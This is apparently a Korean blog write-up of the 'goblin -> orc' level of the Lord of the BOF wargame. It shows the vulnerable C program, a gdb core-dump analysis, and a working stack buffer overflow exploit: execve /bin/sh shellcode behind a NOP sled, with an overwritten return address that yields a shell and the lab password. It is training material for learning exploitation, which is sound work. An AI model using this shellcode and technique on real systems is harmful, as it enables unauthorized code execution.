[LOB] goblin -> orc

2019. 7. 28. 23:43Wargame & CTF/LOB

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
/*
        The Lord of the BOF : The Fellowship of the BOF
        - orc
        - egghunter
*/
 
#include <stdio.h>
#include <stdlib.h>
 
extern char **environ;
 
main(int argc, char *argv[])
{
    char buffer[40];
    int i;
 
    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }
 
    // egghunter 
    for(i=0; environ[i]; i++)
        memset(environ[i], 0, strlen(environ[i]));
 
    if(argv[1][47!= '\xbf')
    {
        printf("stack is still your friend.\n");
        exit(0);
    }
 
    strcpy(buffer, argv[1]); 
    printf("%s\n", buffer);
}
cs


이제 egghunter가 있기 때문에 에그쉘을 이용하지 못한다.

[buffer(40)][SFP(4)][RET(4)]

argv[2]에 쉘코드를 넣고 RET에 &argv[2]를 넣자.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
[goblin@localhost tmp]$ ./orc `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"'` `python -c 'print "\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿
Segmentation fault (core dumped)
[goblin@localhost tmp]$ gdb -q orc core 
Core was generated by `./orc AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿ '.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0  0xbfbfbfbf in ?? ()
(gdb) x/80x $esp
0xbffff6d0:    0x00000000    0xbffff714    0xbffff724    0x40013868
0xbffff6e0:    0x00000003    0x08048450    0x00000000    0x08048471
0xbffff6f0:    0x08048500    0x00000003    0xbffff714    0x08048390
0xbffff700:    0x0804860c    0x4000ae60    0xbffff70c    0x40013e90
0xbffff710:    0x00000003    0xbffff824    0xbffff82a    0xbffff85b
0xbffff720:    0x00000000    0xbffffc5d    0xbffffc72    0xbffffc8a
0xbffff730:    0xbffffca9    0xbffffccb    0xbffffcdd    0xbffffce9
0xbffff740:    0xbffffeac    0xbffffecb    0xbffffee5    0xbffffefa
0xbffff750:    0xbfffff05    0xbfffff1e    0xbfffff2d    0xbfffff35
0xbffff760:    0xbfffff46    0xbfffff54    0xbfffff62    0xbfffff73
0xbffff770:    0xbfffff81    0xbfffff8c    0xbfffff9e    0xbfffffda
0xbffff780:    0xbfffffe2    0x00000000    0x00000003    0x08048034
0xbffff790:    0x00000004    0x00000020    0x00000005    0x00000006
0xbffff7a0:    0x00000006    0x00001000    0x00000007    0x40000000
0xbffff7b0:    0x00000008    0x00000000    0x00000009    0x08048450
0xbffff7c0:    0x0000000b    0x000001f7    0x0000000c    0x000001f7
0xbffff7d0:    0x0000000d    0x000001f7    0x0000000e    0x000001f7
0xbffff7e0:    0x00000010    0x0f8bfbff    0x0000000f    0xbffff81f
0xbffff7f0:    0x00000000    0x00000000    0x00000000    0x00000000
0xbffff800:    0x00000000    0x00000000    0x00000000    0x00000000
(gdb) 
0xbffff810:    0x00000000    0x00000000    0x00000000    0x69000000
0xbffff820:    0x00363836    0x726f2f2e    0x41410063    0x41414141
0xbffff830:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff840:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff850:    0x41414141    0xbfbf4141    0x9000bfbf    0x90909090
0xbffff860:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff870:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff880:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff890:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff8a0:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff8b0:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff8c0:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff8d0:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff8e0:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff8f0:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff900:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff910:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff920:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff930:    0x90909090    0x90909090    0x90909090    0x90909090
0xbffff940:    0x90909090    0x90909090    0x90909090    0x90909090
cs


Segmentation fault를 띄워서 core를 덤프한다음에 분석한다. 만약 core dumped라는 메시지가 뜨지 않는다면 tmp폴더를 만들어서 orc파일을 복사해서 실행해보면 된다. 그래도 안된다면 ulimit -c unlimited 를 치면 해결될것이다.

0x90 시작부분 <= RET <= 0x90 끝부분 <- 이렇게 RET을 설정하면 0x90(놉코드)는 아무것도 하지 않고 다음 코드를 실행하라는 뜻이므로 쭉 가다가 쉘코드를 만나서 실행되게 된다. 이것을 NOP SLED(놉슬레드)라고 한다. 나는 0xbffff901을 RET 에 넣을것이다.


1
2
3
4
5
6
[goblin@localhost goblin]$ ./orc `python -c 'print "A"*44+"\x01\xf9\xff\xbf"'` `python -c 'print "\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
bash$ my-pass
euid = 504
cantata
 
cs


orc : cantata

저작자표시 (새창열림)

'Wargame & CTF > LOB' 카테고리의 다른 글

[LOB] wolfman -> darkelf  (0) 2019.07.28
[LOB] orc -> wolfman  (0) 2019.07.28
[LOB] cobolt -> goblin  (0) 2019.07.28
[LOB] gremlin -> cobolt  (0) 2019.07.28
[LOB] gate -> gremlin  (0) 2019.07.28

관련글

댓글 0

티스토리툴바